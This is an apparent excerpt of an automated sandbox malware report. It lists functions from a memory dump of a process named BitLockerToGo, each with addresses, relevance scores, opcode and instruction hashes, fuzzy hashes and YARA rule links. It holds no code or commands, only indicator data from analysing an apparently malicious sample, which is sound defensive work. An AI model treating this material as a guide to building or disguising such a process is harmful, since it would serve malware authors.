                                                                                                                                                                                        • Opcode ID: 84d3aae2d6339a71a846d6ed6450fe4ad1398a78898a92f22b5b61fe0340e378
                                                                                                                                                                                        • Instruction ID: f3e31dbd2123681d619c4937e3dfbb8938af2d17b466c5779291908e7a96e325
                                                                                                                                                                                        • Opcode Fuzzy Hash: 84d3aae2d6339a71a846d6ed6450fe4ad1398a78898a92f22b5b61fe0340e378
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7551B976E106258BCB15CF6CD8906ADB7E2AFC8310B59826DD819AB385DB34AC11C7D4
                                                                                                                                                                                        Function 004394D0 Relevance: .2, Instructions: 189COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 883696312f7659cbf717281f956e5609cf3f283078f642d9b427e17a3555d2e0
                                                                                                                                                                                        • Instruction ID: 3febaa2971ac60a0832a273e0d02601136f1283f656963cd03d2697058b2fec3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 883696312f7659cbf717281f956e5609cf3f283078f642d9b427e17a3555d2e0
                                                                                                                                                                                        • Instruction Fuzzy Hash: 99515EB25087549FE314DF29D49435BBBE1BBC8318F044E2EE4D987390E379DA088B86
                                                                                                                                                                                        Function 00426E68 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: e5edece35c1fcd9feea54095b4b5e969ab831b9077076869dd61b4390d696775
                                                                                                                                                                                        • Instruction ID: e5fa04d6ebca31e3f1bbf529f4b956f2bb6aa9f0ac85b88c12aebc6f2ff34523
                                                                                                                                                                                        • Opcode Fuzzy Hash: e5edece35c1fcd9feea54095b4b5e969ab831b9077076869dd61b4390d696775
                                                                                                                                                                                        • Instruction Fuzzy Hash: A951D439A00152CFEB08CF68EC6466AB3B2FF8A354F2A4579C805A7355C735DD21CB88
                                                                                                                                                                                        Function 0040DE3F Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 094cc9ebf2b94b58a77a7d54baf87293764c3aeed93d30dc14a5af31c842adab
                                                                                                                                                                                        • Instruction ID: 3ef8a3485e4a09ca9123fd3bdb5a29c84306ad2741da8354012a75911fbdc9a7
                                                                                                                                                                                        • Opcode Fuzzy Hash: 094cc9ebf2b94b58a77a7d54baf87293764c3aeed93d30dc14a5af31c842adab
                                                                                                                                                                                        • Instruction Fuzzy Hash: DF514D756183515FD708DF36DC9126EBBD2FBD6308F08993EE4C293392E574850A8B4A
                                                                                                                                                                                        Function 00426E2C Relevance: .2, Instructions: 182COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 60c9f6c16bd9daf7dcf07de92bed7ec2e130b78c80c7db28483ecd274fc7c44c
                                                                                                                                                                                        • Instruction ID: 279d7b2eb0a8fcf33c8dcb7f0c65d215301ead192100c4c0499fc11db8e1e484
                                                                                                                                                                                        • Opcode Fuzzy Hash: 60c9f6c16bd9daf7dcf07de92bed7ec2e130b78c80c7db28483ecd274fc7c44c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9851E339A04152CFEB04CF68EC6466AB3B2FF8A354F2A4579D405A7355C735DD22CB88
                                                                                                                                                                                        Function 00405640 Relevance: .2, Instructions: 166COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 29b770aec6dfd337e65346c3475f8fa8a9074e8de6f262c0b2043a68c75a11d4
                                                                                                                                                                                        • Instruction ID: 228cd8622fa8bfc489c00fd1f6fc7f4016d405ff87da472aa5861001d763d770
                                                                                                                                                                                        • Opcode Fuzzy Hash: 29b770aec6dfd337e65346c3475f8fa8a9074e8de6f262c0b2043a68c75a11d4
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C51C0B5A046009FC714EF18C480927B7A1FF89324F154A7EE859AB392E739EC41CF96
                                                                                                                                                                                        Function 0043DB50 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: f2f29e45a297f0d020c3e925ca4051dcc3850d2f384a99105424c8874c3d9e26
                                                                                                                                                                                        • Instruction ID: 50c658e84087e5bd2fd9b5c4ee6627a61c27f6a135d209fb7cb5d54e1aaf484b
                                                                                                                                                                                        • Opcode Fuzzy Hash: f2f29e45a297f0d020c3e925ca4051dcc3850d2f384a99105424c8874c3d9e26
                                                                                                                                                                                        • Instruction Fuzzy Hash: EE411775E083009FD720AF25A940E27F3A2EB89714F29A43EE5895B352D374EC11CB9D
                                                                                                                                                                                        Function 00410D40 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 0e106eb1173ea1862e037f97892a3d6c5de370f350888938d0229b7b3629f412
                                                                                                                                                                                        • Instruction ID: 60a574b1927e06f973ee1322de91ddd5f815be0c265b9edb6f3a67c7cb1edc19
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e106eb1173ea1862e037f97892a3d6c5de370f350888938d0229b7b3629f412
                                                                                                                                                                                        • Instruction Fuzzy Hash: BC4126727187600BD30CCE7A989026ABAD29BC6310F09CB3EF0A5C73D5D678DA859745
                                                                                                                                                                                        Function 0043AB70 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: c8e2e1791fc48275d03f5d3130ff62834ee4dcc124df446f23d03ca8fabc462e
                                                                                                                                                                                        • Instruction ID: 32ae4797e12eab1b205d30e64d81c5860ce0edace74540fbba17bc4f79a9d616
                                                                                                                                                                                        • Opcode Fuzzy Hash: c8e2e1791fc48275d03f5d3130ff62834ee4dcc124df446f23d03ca8fabc462e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 43319B75B842046BF710AB19DC81B3BB39AEFC8318F04653AF8C597252E639DC25825B
                                                                                                                                                                                        Function 0040EB50 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 8e897fd82ec72377907dd00d318980a70d53f6494a585f5e700c8fee083c478c
                                                                                                                                                                                        • Instruction ID: 350ebd22c4929d93d764c61523a1fbe5fb2502cd1d8c454ed063ec98364ef43a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e897fd82ec72377907dd00d318980a70d53f6494a585f5e700c8fee083c478c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2331B17140835A9AD724DF11C8807AFB7F4AF86304F144C3ED48653290EB78A955CB6A
                                                                                                                                                                                        Function 00406A30 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 673162ba6d375d50d9dc9659cfa29583d419bf2c06ac203f0a5ce742a8ca816e
                                                                                                                                                                                        • Instruction ID: 5839213391cd6851d30cbb42797d8ae624273ee2e20445eb9e3bb11759f1b5c2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 673162ba6d375d50d9dc9659cfa29583d419bf2c06ac203f0a5ce742a8ca816e
                                                                                                                                                                                        • Instruction Fuzzy Hash: E111043BB246354BE750DFBADCC45176342EBC621470A4039EA47F3382C636E821D595
                                                                                                                                                                                        Function 004370D0 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                        • Instruction ID: 0b60e182974695e82f291e9ab23c88d0fb779e3ea45a278f773647b165bd4164
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                        • Instruction Fuzzy Hash: B111E973A091D40EC7268D3C8800565BFA30A97634F19939AF4F89B3D2D6268D8B8359
                                                                                                                                                                                        Function 0042DD20 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 36cb41210e30e0db0488c0b9bc8dcc56972082b22ac2856e0ffbf0ca560f396d
                                                                                                                                                                                        • Instruction ID: 03bece97555b97dc3f485b073082eda2b04054ac89a4bf728c24fc700a6c2a11
                                                                                                                                                                                        • Opcode Fuzzy Hash: 36cb41210e30e0db0488c0b9bc8dcc56972082b22ac2856e0ffbf0ca560f396d
                                                                                                                                                                                        • Instruction Fuzzy Hash: C10192B5F10B2167E620AF11F8C0B3BA2A89B86708F98453ED40857342EB79FC05869D
                                                                                                                                                                                        Function 004401EA Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 873b7a95247772dc31e5ae1c420413bd4bea4ddec8833d4bc36669b6062b1270
                                                                                                                                                                                        • Instruction ID: 16a5bd1e6a5ecf6f416ad84edf7b6ca58eef5b7241e4cd85767b0b96f29fecd5
                                                                                                                                                                                        • Opcode Fuzzy Hash: 873b7a95247772dc31e5ae1c420413bd4bea4ddec8833d4bc36669b6062b1270
                                                                                                                                                                                        • Instruction Fuzzy Hash: ABF0373041921386E714CF50C4A5273B3B2FFE6745F25584AE6822B794E3B9992AC34E
                                                                                                                                                                                        Function 0041CA20 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 931e92df6a04de479f3c1813266d974a05571062c0c4ca0078d8e6d435bd14da
                                                                                                                                                                                        • Instruction ID: 5bcb3b99a156c0565cb54d318949b250c594c88ab300319b305849b598191ada
                                                                                                                                                                                        • Opcode Fuzzy Hash: 931e92df6a04de479f3c1813266d974a05571062c0c4ca0078d8e6d435bd14da
                                                                                                                                                                                        • Instruction Fuzzy Hash: 64F0ECB1A4422457DB23C955DCC0FB7BB9CCF87754F190416F84597202E17558C4C3E9
                                                                                                                                                                                        Function 0043C580 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                                        • Instruction ID: 188a4481b83bd3bd3439358da7cf7c9d86e76e76563c9335fd8d81424d3a28bf
                                                                                                                                                                                        • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                                        • Instruction Fuzzy Hash: A4D05B21508231569B648D199440577F7E0E9CF711F45655FF581E3244D234EC41C26D
                                                                                                                                                                                        Function 0042C8F2 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 6dfc62f6efaa63d5e57ffae435b381336ea921fb81d6dd13ec297b24b88b3b6b
                                                                                                                                                                                        • Instruction ID: a855f599016ca4122678c5666a62a9ad445343775f9a67c88eb9ee8d5a13bef0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6dfc62f6efaa63d5e57ffae435b381336ea921fb81d6dd13ec297b24b88b3b6b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 89B01278D48010E2C1004F01B841871E174418B20EF303132D009F7352E23AF413424F
                                                                                                                                                                                        Function 00433F7B Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 81COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                        • String ID: I$Q$S$U$W$Y$[$]$_
                                                                                                                                                                                        • API String ID: 2610073882-2049440583
                                                                                                                                                                                        • Opcode ID: 5c4d2b8daaf2047a618b2a7391d162b9d2ba9717e45a843e8fbf92152eee8349
                                                                                                                                                                                        • Instruction ID: fb63f1c16cb9b2398874c8dcd74843d0ed7ff5dc01cfbb9ad6ab2a1c60691d90
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c4d2b8daaf2047a618b2a7391d162b9d2ba9717e45a843e8fbf92152eee8349
                                                                                                                                                                                        • Instruction Fuzzy Hash: C2410B60108BC18ED7259F38C8987567FA16B66324F1886DCD8E60F3D7C7799409CB62